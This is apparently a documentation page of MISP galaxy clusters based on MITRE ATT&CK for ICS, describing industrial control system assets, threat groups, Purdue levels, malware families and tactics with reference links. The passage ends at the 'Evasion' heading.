mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Hiding Rules - T1564.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 4332. Table References
Links
https://attack.mitre.org/mitigations/M1047

Assets

A list of asset categories that are commonly found in industrial control systems..

Assets is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Control Server

A device which acts as both a server and controller, that hosts the control software used in communicating with lower-level control devices in an ICS network (e.g. Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs)).

The tag is: misp-galaxy:mitre-ics-assets="Control Server"

Table 4333. Table References
Links
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Data Historian

A centralized database located on a computer installed in the control system DMZ supporting external corporate user data access for archival and analysis using statistical process control and other techniques.

The tag is: misp-galaxy:mitre-ics-assets="Data Historian"

Table 4334. Table References
Links
https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

Engineering Workstation

The engineering workstation is usually a high-end very reliable computing platform designed for configuration, maintenance and diagnostics of the control system applications and other control system equipment. The system is usually made up of redundant hard disk drives, high speed network interface, reliable CPUs, performance graphics hardware, and applications that provide configuration and monitoring tools to perform control system application development, compilation and distribution of system modifications.

The tag is: misp-galaxy:mitre-ics-assets="Engineering Workstation"

Field Controller/RTU/PLC/IED

Controller terminology depends on the type of system they are associated with. They provide typical processing capabilities. Controllers, sometimes referred to as Remote Terminal Units (RTU) and Programmable Logic Controllers (PLC), are computerized control units that are typically rack or panel mounted with modular processing and interface cards. The units are collocated with the process equipment and interface through input and output modules to the various sensors and controlled devices. Most utilize a programmable logic-based application that provides scanning and writing of data to and from the IO interface modules and communicates with the control system network via various communications methods, including serial and network communications

The tag is: misp-galaxy:mitre-ics-assets="Field Controller/RTU/PLC/IED"

Human-Machine Interface

In computer science and human-computer interaction, the Human-Machine Interface (HMI) refers to the graphical, textual and auditory information the program presents to the user (operator) using computer monitors and audio subsystems, and the control sequences (such as keystrokes with the computer keyboard, movements of the computer mouse, and selections with the touchscreen) the user employs to control the program. Currently the following types of HMI are the most common: Graphical user interfaces(GUI) accept input via devices such as computer keyboard and mouse and provide articulated graphical output on the computer monitor. Web-based user interfaces accept input and provide output by generating web pages which are transported via the network and viewed by the user using a web browser program. The operations user must be able to control the system and assess the state of the system. Each control system vendor provides a unique look-and-feel to their basic HMI applications. An older, not gender-neutral version of the term is man-machine interface (MMI). The system may expose several user interfaces to serve different kinds of users. User interface screens may be optimized to provide the appropriate information and control interface to operations users, engineering users and management users.

The tag is: misp-galaxy:mitre-ics-assets="Human-Machine Interface"

Input/Output Server

The Input/Output (I/O) server provides the interface between the control system LAN applications and the field equipment monitored and controlled by the control system applications. The I/O server, sometimes referred to as a Front-End Processor (FEP) or Data Acquisition Server (DAS), converts the control system application data into packets that are transmitted over various types of communications media to the end device locations. The I/O server also converts data received from the various end devices over different communications mediums into data formatted to communicate with the control system networked applications.

The tag is: misp-galaxy:mitre-ics-assets="Input/Output Server"

Safety Instrumented System/Protection Relay

A safety instrumented system (SIS) takes automated action to keep a plant in a safe state, or to put it into a safe state, when abnormal conditions are present. The SIS may implement a single function or multiple functions to protect against various process hazards in your plant. The function of protective relaying is to cause the prompt removal from service of an element of a power system when it suffers a short circuit or when it starts to operate in any abnormal manner that might cause damage or otherwise interfere with the effective operation of the rest of the system.

The tag is: misp-galaxy:mitre-ics-assets="Safety Instrumented System/Protection Relay"

Groups

Groups are sets of related intrusion activity that are tracked by a common name in the security community. Groups are also sometimes referred to as campaigns or intrusion sets. Some groups have multiple names associated with the same set of activities due to various organizations tracking the same set of activities by different names. Groups are mapped to publicly reported technique use and referenced in the ATT&CK for ICS knowledge base. Groups are also mapped to reported software used during intrusions..

Groups is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

ALLANITE

ALLANITE is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group’s tactics and techniques are reportedly similar to Dragonfly / Dragonfly 2.0, although ALLANITE’s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence.

The tag is: misp-galaxy:mitre-ics-groups="ALLANITE"

Table 4335. Table References
Links
https://dragos.com/resource/allanite/
https://www.us-cert.gov/ncas/alerts/TA17-293A
https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk
https://www.eisac.com/public-news-detail?id=115909

APT33

APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.

The tag is: misp-galaxy:mitre-ics-groups="APT33"

Table 4336. Table References
Links
https://attack.mitre.org/groups/G0064/
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://dragos.com/resource/magnallium/
https://www.wired.com/story/iran-hackers-us-phishing-tensions/
https://www.symantec.com/security-center/writeup/2017-030708-4403-99

Dragonfly

Dragonfly is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0. There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: misp-galaxy:mitre-ics-groups="Dragonfly"

Table 4337. Table References
Links
https://attack.mitre.org/groups/G0035/
https://dragos.com/resource/dymalloy/
https://www.us-cert.gov/ncas/alerts/TA17-293A
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

Dragonfly 2.0

Dragonfly 2.0 is a suspected Russian threat group which has been active since at least late 2015. Dragonfly 2.0’s initial reported targets were a part of the energy sector, located within the United States, Switzerland, and Turkey. There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: misp-galaxy:mitre-ics-groups="Dragonfly 2.0"

Table 4338. Table References
Links
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
https://fortune.com/2017/09/06/hack-energy-grid-symantec/
https://dragos.com/resource/dymalloy/
https://blog.talosintelligence.com/2017/07/template-injection.html
https://dragos.com/wp-content/uploads/Sample-WorldView-Report.pdf
https://dragos.com/wp-content/uploads/yir-ics-activity-groups-threat-landscape-2018.pdf

HEXANE

HEXANE is a threat group that has targeted ICS organization within the oil & gas, and telecommunications sectors. Many of the targeted organizations have been located in the Middle East including Kuwait. HEXANE’s targeting of telecommunications has been speculated to be part of an effort to establish man-in-the-middle capabilities throughout the region. HEXANE’s TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.

The tag is: misp-galaxy:mitre-ics-groups="HEXANE"

Table 4339. Table References
Links
https://dragos.com/resource/hexane/
https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign
https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms
https://www.bankinfosecurity.com/lyceum-apt-group-new-threat-to-oil-gas-companies-a-13003

Lazarus group

Lazarus group is a suspected North Korean adversary group that has targeted networks associated with civilian electric energy in Europe, East Asia, and North America. Links have been established associating this group with the WannaCry ransomware from 2017.3 While WannaCry was not an ICS focused attack, Lazarus group is considered to be a threat to ICS. North Korean group definitions are known to have significant overlap, and the name Lazarus Group is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea. Some organizations track North Korean clusters or groups such as Bluenoroff, APT37, and APT38 separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.

The tag is: misp-galaxy:mitre-ics-groups="Lazarus group"

Table 4340. Table References
Links
https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity
https://dragos.com/resource/covellite/
https://www.us-cert.gov/ncas/alerts/TA17-132A
https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
https://www.us-cert.gov/ncas/alerts/TA17-164A
https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos
https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group

Leafminer

Leafminer is a threat group that has targeted Saudi Arabia, Japan, Europe and the United States. Within the US, Leafminer has targeted electric utilities and initial access into those organizations. Reporting indicates that Leafminer has not demonstrated ICS specific or destructive capabilities.

The tag is: misp-galaxy:mitre-ics-groups="Leafminer"

Table 4341. Table References
Links
https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east
https://dragos.com/resource/raspite/

OilRig

OilRig is a suspected Iranian threat group that has targeted the financial, government, energy, chemical, and telecommunication sectors as well as petrochemical, oil & gas. OilRig has been observed operating in Iraq, Pakistan, Israel, and the UK, and has been linked to the Shamoon attacks in 2012 on Saudi Aramco.

The tag is: misp-galaxy:mitre-ics-groups="OilRig"

Table 4342. Table References
Links
https://www.fireeye.com/current-threats/apt-groups.html#apt34
https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
https://dragos.com/resource/chrysene/
https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/

Sandworm

Sandworm is a threat group associated with the Kiev, Ukraine electrical transmission substation attacks which resulted in the impact of electric grid operations on December 17th, 2016. Sandworm has been cited as the authors of the Industroyer malware which was used in the 2016 Ukraine attacks.

The tag is: misp-galaxy:mitre-ics-groups="Sandworm"

Table 4343. Table References
Links
https://dragos.com/resource/electrum/
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B
https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B
https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/
https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/

XENOTIME

XENOTIME is a threat group that has targeted and compromised industrial systems, specifically safety instrumented systems that are designed to provide safety and protective functions. Xenotime has previously targeted oil & gas, as well as electric sectors within the Middle east, Europe, and North America. Xenotime has also been reported to target ICS vendors, manufacturers, and organizations in the middle east. This group is one of the few with reported destructive capabilities.

The tag is: misp-galaxy:mitre-ics-groups="XENOTIME"

Table 4344. Table References
Links
https://dragos.com/resource/xenotime/
https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/
https://dragos.com/blog/trisis/TRISIS-01.pdf
https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf

Levels

Based on the Purdue Model to aid ATT&CK for ICS users to understand which techniques are applicable to their environment..

Levels is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Level 0

The I/O network level includes the actual physical processes and sensors and actuators that are directly connected to process equipment.

The tag is: misp-galaxy:mitre-ics-levels="Level 0"

Level 1

The control network level includes the functions involved in sensing and manipulating physical processes. Typical devices at this level are programmable logic controllers (PLCs), distributed control systems, safety instrumented systems and remote terminal units (RTUs).

The tag is: misp-galaxy:mitre-ics-levels="Level 1"

Level 2

The supervisory control LAN level includes the functions involved in monitoring and controlling physical processes and the general deployment of systems such as human-machine interfaces (HMIs), engineering workstations and historians.

The tag is: misp-galaxy:mitre-ics-levels="Level 2"

Software

Software is a generic term for custom or commercial code, operating system utilities, open-source software, or other tools used to conduct behavior modeled in ATT&CK for ICS..

Software is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

ACAD/Medre.A

ACAD/Medre.A is a worm that steals operational information. The worm collects AutoCAD files with drawings. ACAD/Medre.A has the capability to be used for industrial espionage.

The tag is: misp-galaxy:mitre-ics-software="ACAD/Medre.A"

Table 4345. Table References
Links

Backdoor.Oldrea, Havex

Backdoor.Oldrea is a Remote Access Trojan (RAT) that communicates with a Command and Control (C2) server. The C2 server can deploy payloads that provide additional functionality. One payload has been identified and analyzed that enumerates all connected network resources, such as computers or shared resources, and uses the classic DCOM-based (Distributed Component Object Model) version of the Open Platform Communications (OPC) standard to gather information about connected control system devices and resources within the network.

The tag is: misp-galaxy:mitre-ics-software="Backdoor.Oldrea, Havex"

Table 4346. Table References
Links
https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-176-02A
https://www.f-secure.com/weblog/archives/00002718.html
https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf
https://www.fireeye.com/blog/threat-research/2014/07/havex-its-down-with-opc.html
https://www.symantec.com/connect/blogs/dragonfly-western-energy-companies-under-sabotage-threat
https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939
https://www.sans.org/reading-room/whitepapers/ICS/impact-dragonfly-malware-industrial-control-systems-36672

Bad Rabbit, Diskcoder.D

Bad Rabbit is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine.

The tag is: misp-galaxy:mitre-ics-software="Bad Rabbit, Diskcoder.D"

Table 4347. Table References
Links
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
https://securelist.com/bad-rabbit-ransomware/82851/
https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

BlackEnergy 3

BlackEnergy 3 is a malware toolkit that has been used by both criminal and APT actors. It support various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid.

The tag is: misp-galaxy:mitre-ics-software="BlackEnergy 3"

Table 4348. Table References
Links
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Conficker

Conficker is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant.

The tag is: misp-galaxy:mitre-ics-software="Conficker"

Table 4349. Table References
Links
https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

Duqu

Duqu is a collection of computer malware discovered in 2011. It is reportedly related to the Stuxnet worm, although Duqu is not self-replicating.

The tag is: misp-galaxy:mitre-ics-software="Duqu"

Table 4350. Table References
Links
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Flame

Flame is an attacker-instructed worm which may open a backdoor and steal information from a compromised computer. Flame has the capability to be used for industrial espionage.

The tag is: misp-galaxy:mitre-ics-software="Flame"

Table 4351. Table References
Links
https://www.symantec.com/security-center/writeup/2012-052811-0308-99
https://www.welivesecurity.com/2012/07/20/flame-in-depth-code-analysis-of-mssecmgr-ocx/
https://www.fireeye.com/blog/threat-research/2012/05/flamerskywiper-analysis.html

Industroyer

Industroyer is a sophisticated piece of malware designed to cause an Impact to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.1 Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.

The tag is: misp-galaxy:mitre-ics-software="Industroyer"

Table 4352. Table References
Links
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
https://www.us-cert.gov/ncas/alerts/TA17-163A
https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf

KillDisk

In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk’s main functionality is to overwrite files with random data, rendering the OS unbootable.

The tag is: misp-galaxy:mitre-ics-software="KillDisk"

Table 4353. Table References
Links
https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

LockerGoga

LockerGoga is ransomware that has been tied to various attacks on industrial and manufacturing firms with apparently catastrophic consequences.

The tag is: misp-galaxy:mitre-ics-software="LockerGoga"

Table 4354. Table References
Links
https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/
https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880
https://www.hydro.com/en/media/on-the-agenda/cyber-attack/

NotPetya

NotPetya is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though NotPetya presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.

The tag is: misp-galaxy:mitre-ics-software="NotPetya"

Table 4355. Table References
Links
https://attack.mitre.org/software/S0368/
https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/
https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war

PLC-Blaster

PLC-Blaster is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules.

The tag is: misp-galaxy:mitre-ics-software="PLC-Blaster"

Table 4356. Table References
Links
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

Ryuk

Ryuk is ransomware that was first seen targeting large organizations for high-value ransoms in August of 2018. Ryuk temporarily disrupted operations at a manufacturing firm in 2018.

The tag is: misp-galaxy:mitre-ics-software="Ryuk"

Table 4357. Table References
Links
https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760

Stuxnet

Stuxnet was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.

The tag is: misp-galaxy:mitre-ics-software="Stuxnet"

Table 4358. Table References
Links
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.symantec.com/security-center/writeup/2010-071400-3123-99
https://www.us-cert.gov/ics/advisories/ICSA-10-238-01B
https://scadahacker.com/resources/stuxnet-mitigation.html
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Triton

Triton is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers

The tag is: misp-galaxy:mitre-ics-software="Triton"

Table 4359. Table References
Links
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://dragos.com/blog/trisis/TRISIS-01.pdf
https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf
https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s
https://www.youtube.com/watch?v=XwSJ8hloGvY
https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2017-347-01+Triconex+V3.pdf&p_Doc_Ref=SEVD-2017-347-01
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-02
https://nvd.nist.gov/vuln/detail/CVE-2018-8872
https://cwe.mitre.org/data/definitions/119.html
https://www.nrc.gov/docs/ML1209/ML120900890.pdf
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library

VPNFilter

VPNFilter is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. VPNFilter modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols

The tag is: misp-galaxy:mitre-ics-software="VPNFilter"

Table 4360. Table References
Links
https://blog.talosintelligence.com/2018/06/vpnfilter-update.html
https://www.youtube.com/watch?v=yuZazP22rpI

WannaCry

WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploit EternalBlue.

The tag is: misp-galaxy:mitre-ics-software="WannaCry"

Table 4361. Table References
Links
https://attack.mitre.org/software/S0366/
https://www.us-cert.gov/ncas/alerts/TA17-132A
https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Tactics

A list of all 11 tactics in ATT&CK for ICS.

Tactics is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Collection

The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal. Collection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of Discovery, to compile data on control systems and targets of interest that may be used to follow through on the adversary’s objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plan operations. For example, information repositories on plant data at a high level or device specific programs at a low level. Sensitive floor plans, vendor device manuals, and other refs may also be at risk and exposed on the internet or otherwise publicly accessible.

The tag is: misp-galaxy:mitre-ics-tactics="Collection"

Table 4362. Table References
Links
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
http://www.research.lancs.ac.uk/portal/files/196578358/sample_sigconf.pdf
https://www.us-cert.gov/ncas/alerts/TA17-293A

Command and Control

The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment. Command and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use commonly available resources and mimic expected network traffic to avoid detection and suspicion. For instance, commonly used ports and protocols in ICS environments, and even expected IT resources, depending on the target network. Command and Control may be established to varying degrees of stealth, often depending on the victim’s network structure and defenses.

The tag is: misp-galaxy:mitre-ics-tactics="Command and Control"

Table 4363. Table References
Links
https://attack.mitre.org/wiki/Technique/T1090

Discovery

The adversary is trying to figure out your ICS environment. Discovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.

The tag is: misp-galaxy:mitre-ics-tactics="Discovery"

Table 4364. Table References
Links
https://attack.mitre.org/wiki/Technique/T1049
https://attack.mitre.org/wiki/Technique/T1040
https://attack.mitre.org/wiki/Technique/T1018

Evasion

